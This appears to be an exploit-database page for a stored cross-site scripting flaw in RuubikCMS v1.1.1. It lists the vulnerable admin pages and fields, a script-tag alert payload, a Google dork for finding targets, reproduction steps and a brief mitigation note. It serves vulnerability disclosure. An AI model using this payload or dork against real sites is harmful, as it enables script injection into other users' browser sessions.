header-logo
Suggest Exploit
vendor:
RuubikCMS
by:
expl0i13r
N/A
CVSS
MEDIUM
Stored XSS
79
CWE
Product Name: RuubikCMS
Affected Version From: 1.1.2001
Affected Version To: 1.1.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2013

ruubikcms v1.1.1 Stored XSS

RuubikCMS v1.1.1 is vulnerable to Stored XSS. The vulnerability exists in the 'name' parameter of the POST request to '/ruubikcms/ruubikcms/cms/index.php'. Attackers can exploit this vulnerability to execute arbitrary HTML and script code in a user's browser session.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and encode special characters before displaying them on web pages. Regular security updates should also be applied to the RuubikCMS software to patch any known vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: [ruubikcms v1.1.1 Stored XSS]
# Google Dork: [powered by ruubikcms] 
# Date: [2013-6-5]
# Exploit Author: [expl0i13r]
# Vendor Homepage: [http://www.ruubikcms.com/]
# Software Link: [http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip]
# Version: [1.1.1]
# Tested on: [Windows 7]
# Contact: expl0i13r@gmail.com

Description:
-------------

RuubikCMS is an open source website content management tool which is designed to be user-friendly for both the end-user and the webmaster.

ruubikcms v1.1.1 suffers from  Stored XSS vulnerability, when parsing user input to the 'name' parameter via POST method through '/ruubikcms/ruubikcms/cms/index.php'.
Attackers can exploit these weaknesses to execute arbitrary HTML and script code
in a user's browser session.

Tested on : Windows 7 
Browsers  : Chrome,Internet Explorer, Firefox


POC of the vulnerabilities : 
-----------------------------

Stored XSS Vulnerable URL's
----------------------------

http://127.0.0.1/ruubikcms/ruubikcms/cms/index.php		    [vulnerable : name]
http://127.0.0.1/ruubikcms/ruubikcms/cms/extranet.php?p=member-area [vulnerable : name] 
http://127.0.0.1/ruubikcms/ruubikcms/cms/sitesetup.php		    [Vulnerable : name , siteroot]
http://127.0.0.1/ruubikcms/ruubikcms/cms/users.php?role=5&p=test    [Vulnerable : firstname , lastname]

p@yl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script>


Example: 

Pagemanagement > Page name

1. Enter pAyl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script> in: 
   "Page management" > "Page name" textbox
 
2. Refresh page and click on Free Pages and p0p up will come.

3. Also Click on tab "News" which will load our injected XSS code , it will be available in drop down menu : News > Link to page (optional) 


# blackpentesters.blogspot.com [2013-6-5]
# infotech-knowledge.blogspot.com